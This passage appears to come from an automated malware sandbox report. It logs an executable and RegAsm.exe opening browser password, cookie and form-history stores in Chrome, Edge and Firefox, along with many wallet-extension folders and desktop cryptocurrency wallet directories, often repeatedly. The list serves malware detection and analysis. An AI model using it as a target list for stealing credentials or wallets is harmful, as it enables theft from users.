                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
